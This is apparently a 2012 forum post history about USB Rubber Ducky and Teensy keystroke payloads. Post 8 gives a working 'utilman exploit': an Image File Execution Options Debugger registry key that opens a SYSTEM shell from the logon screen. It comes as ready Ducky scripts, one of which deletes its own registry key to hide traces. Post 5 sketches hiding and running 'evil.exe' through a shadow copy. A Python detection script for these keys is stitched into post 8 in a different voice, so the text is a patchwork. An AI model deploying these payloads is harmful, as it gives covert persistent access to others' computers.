
PCFreak

Active Members
  • Posts: 25
  • Days Won: 1

Everything posted by PCFreak

  1. What script do you mean? The vssown.vbs? It should work on a Win7 Box without any problems (administrative shell required). Cheers PCFreak
  2. Try to use this Java RDP client. Successfully added it to my Adito installation and it works with Win7 and Server 2008. Also take a look at this one.
  3. I have a Teensy 2.0. It is enough for just emulating a HID device. It costs $16 and does exactly what it should. Btw. you can do much more with it, since it also has many I/O ports on it. The difference between the Teensy and the Ducky is that the Ducky is smaller and that the payload comes from the SD card. On the Teensy you have to plug in the Teensy to program it, and the payload is stored in the RAM on the Teensy. You have about 32K available. A normal payload takes about 4K. I recommend you read this page http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle and use Irongeek's "phukd" library to make it easier for you. It depends on you. If you understand a little bit about programming, then the Teensy is a good choice. If the Ducky were perfect (firmware + encoder), its price would be okay. At the moment it is too expensive, since the software for the Ducky is not very well programmed. If you have further questions just send me a PM. Cheers PCFreak
  4. As a user you can only write to "your" part of the registry, which is "HKCU" (HKEY_CURRENT_USER). To be able to write to "HKLM" (HKEY_LOCAL_MACHINE) you need administrative rights. The original Utilman exploit also needs administrative rights or needs to be applied from an externally booted operating system, since it changes files in the Windows\system32 directory. The utilman exploit is not a "privilege escalation" exploit. If you have physical access to a machine (which you of course need to plug in the Ducky) you can always get access. The only way to avoid this is to always lock your machine when leaving it and fully encrypt your hard drive. Concerning your workplace computer: maybe your administrator did the right thing and did not give you administrative rights, or you just did not start regedit (or whatever program you use to edit the registry) with administrative rights? I use the utilman exploit with the registry key only for the purpose of showing our employees how dangerous it is not to lock your machine. Cheers PCFreak
  5. I played a little bit with it. For Rubber Ducky payloads it does not make that much sense, since we do everything by keyboard, and if we create an evil executable on the target system just by keyboard inputs we do not need to hide it, we want to execute it right now! It might be interesting if you want to place the executable on the target system and then run it via a scheduled task that you also set up with the Ducky. I am thinking about the following:
     1. Create the executable via base64 encoding through VBScript in the windows\system32 folder
     2. Place vssown.vbs on the target system
     3. Create a shadow copy
     4. Delete your executable
     5. Set up a scheduled task that calls vssown.vbs /execute \Windows\system32\evil.exe
     The only advantage of this procedure would be that evil.exe is not visible to nearly 99% of users, since no one would mount a shadow copy. My opinion: good idea, but not so practical for the Ducky. Maybe if we could access the Ducky's flash somehow it might be interesting in the future. Cheers Peter
  6. The original utilman exploit is usually used to reset the password on Windows 7 machines by booting a Linux Live CD, copying utilman.exe to utilman.bak, copying cmd.exe to utilman.exe and then rebooting. When pressing the EoA button you can reset the password in the opening system shell. The goal of my payload was to show our employees in the "IT Security and Safety Training" what an attacker can do if he has 30 seconds of access to an unlocked Windows 7 machine. Believe me, showing them something is better than just telling them! And the USB Rubber Ducky is the ideal device to do so! But the technique with the registry key could also be used for the password recovery purpose. Instead of making modifications to utilman.exe it would be easier just to offline-edit the registry to do the same. The nice thing about the registry method is that you could auto-delete the key on execution and the system works as it did before. I am currently thinking about writing a small program for a Live Windows PE CD and/or Linux that does exactly that. My idea is that you just execute
     ResetPass [path to Software hive] [username] [new password]
     So just calling
     (Linux)   ResetPass '/mnt/C/Windows/System32/config/software' "pcfreak" "changeme"
     (Windows) ResetPass.exe 'X:\Windows\System32\config\software' "pcfreak" "changeme"
     would place the correct command into the registry that needs to get executed to reset the password for user "pcfreak" to "changeme". After booting the system and pressing the EoA button you can log in with the new password. When I have the time to code this and it is working I will surely let you know. Cheers PCFreak
  7. It runs as SYSTEM, as utilman would. The system executes the debugger (which is now cmd.exe) as it would execute utilman! The replacement (debugger) runs in the same context as the executable would have run originally. Just try it out. Cheers PCFreak
  8. Hi, I recently created a very nice utilman exploit that I would like to share with you. The difference to all other methods currently used with the Ducky is that my version does not need to change any system file. I just set a registry key and all is done. I will explain in detail here how it works. The currently available utilman exploits using the Ducky change the user rights of utilman.exe, so that it can be backed up and replaced with cmd.exe. This is a huge change to the system and it leaves a lot of traces. <_< As described in this Microsoft article about "Launching the debugger automatically", reading further in this article you learn how to set up the system so that instead of the "real program" the debugger is executed. So let's apply that to the utilman exploit. We just need to tell the system to execute CMD.EXE instead of UTILMAN.EXE to be able to log on to the system just by clicking the "Ease of Access" button at the logon screen. Nothing is easier than that, just use this command (as an administrative user):
     REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
     That's all - try it out! So one could now combine the already available payload for an administrative command prompt on Windows 7
     GUI
     DELAY 50
     STRING cmd
     MENU
     STRING a
     ENTER
     LEFT
     ENTER
     DELAY 200
     with this
     STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d cmd.exe /f
     ENTER
     STRING EXIT
     ENTER
     and now has the ability to log in to this system whenever he wants, just by clicking the "Ease of Access" button at the logon screen.
     You could go one step further by using this code to add the registry key:
     STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /d "cmd.exe /c start """Utilman Exploit by PCFreak""" cmd.exe /s /k REG DELETE """HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe""" /f && @echo Enjoy!" /f
     ENTER
     STRING EXIT
     ENTER
     This does the same, but when using utilman.exe (press the EoA button on the lock screen) the opening command shell automatically removes its tracks from the registry and stays open, so after using the exploit it is not trackable any more. Currently I cannot try this myself with the USB Rubber Ducky, since I have a German keyboard and with the Ducky it is still not possible to switch keyboard layouts, but the above code should work. I have working code and a demonstration video of how it works on my blog (blog.pcfreak.de). Here is the source code for the Teensy 2.0 board: http://blog.pcfreak.de/wp-content/upload/most_sophisticated_utilman_exploit.zip I hope you find this sophisticated method interesting and have fun with it. ;) Cheers PCFreak
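The registry setting that post 8 relies on is straightforward to look for from the defensive side. The Python script below is an added example, not code from PCFreak's post, the Teensy zip or the Ducky project: it parses a `reg export` dump of the Image File Execution Options key (the standard "Windows Registry Editor Version 5.00" text format) and reports every per-image subkey carrying a Debugger value, rating an entry "high" when the image is Utilman.exe (reachable from the logon screen, as the post explains) or when the "debugger" is simply cmd.exe, and "review" otherwise. The function names (`parse_reg_export`, `find_ifeo_debuggers`, `debugger_image`) and the embedded sample export are my own constructions; the sample mirrors the self-deleting Utilman.exe value from the post next to a benign-looking debugger registration and an entry with no Debugger at all.

```python
import re

# Added detection example (not from PCFreak's post or the Ducky project).
# Scans a 'Windows Registry Editor Version 5.00' text export of the IFEO key
# and reports per-image subkeys that carry a Debugger value, the mechanism
# the post uses to have cmd.exe start in place of Utilman.exe.

IFEO_PREFIX = (
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
    "\\Image File Execution Options\\"
)

# Constructed sample in the format written by
#   reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg
# Entry 1 mirrors the self-deleting Utilman.exe key from the post, entry 2 is a
# benign-looking debugger registration, entry 3 has no Debugger value at all.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe]
"Debugger"="cmd.exe /c start \"Utilman Exploit by PCFreak\" cmd.exe /s /k REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe\" /f && @echo Enjoy!"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="\"C:\\Program Files\\Example Debugger\\debugger.exe\" -p"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"GlobalFlag"=dword:00000200
'''

# A value line is either "name"=data or @=data (the default value).
_VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _unescape(s):
    """Undo .reg string escaping (backslash-backslash and backslash-quote)."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for a .reg text export.

    Quoted (REG_SZ) data is unescaped; other types such as dword:/hex: are kept
    as raw text, which is all this check needs. Hex continuation lines (those
    not starting with a quote) are ignored.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name = _unescape(m.group(1)) if m.group(1) is not None else ""
            data = m.group(2).strip()
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])
            keys[current][name] = data
    return keys


def debugger_image(debugger):
    """Lower-cased executable file name from a Debugger value, which may be a
    quoted path followed by arguments."""
    s = debugger.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        exe = s[1:end] if end != -1 else s[1:]
    else:
        exe = s.split(None, 1)[0] if s else ""
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_ifeo_debuggers(keys):
    """List every IFEO subkey with a Debugger value, rated for triage:
    'high' for Utilman.exe (launchable from the logon screen) or a plain
    cmd.exe 'debugger'; 'review' for any other registration."""
    findings = []
    for key, values in keys.items():
        if not key.upper().startswith(IFEO_PREFIX.upper()):
            continue
        target = key[len(IFEO_PREFIX):]
        # Registry value names are case-insensitive.
        debugger = next((v for n, v in values.items() if n.lower() == "debugger"), None)
        if debugger is None:
            continue
        image = debugger_image(debugger)
        high = target.lower() == "utilman.exe" or image == "cmd.exe"
        findings.append({"target": target, "debugger": debugger,
                         "image": image, "severity": "high" if high else "review"})
    return findings


if __name__ == "__main__":
    for f in find_ifeo_debuggers(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{f['severity']}] {f['target']} -> {f['image']}: {f['debugger']}")
```

On a real system, `reg export` writes the file as UTF-16LE with a byte-order mark, so open it with `encoding="utf-16"` before handing the text to `parse_reg_export`. Two caveats worth keeping in mind: Debugger registrations under IFEO do have legitimate uses, which is why anything other than the Utilman.exe/cmd.exe pattern is only marked for review, and the self-deleting variant in the post removes its own key the first time it is used, so a point-in-time scan like this one can come up empty after the fact. Auditing modifications of the IFEO key as they happen (Windows registry auditing, or Sysmon's registry value-set events) is what records the key being written in the first place.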
  9. It's January 17th 2012 now - just for information!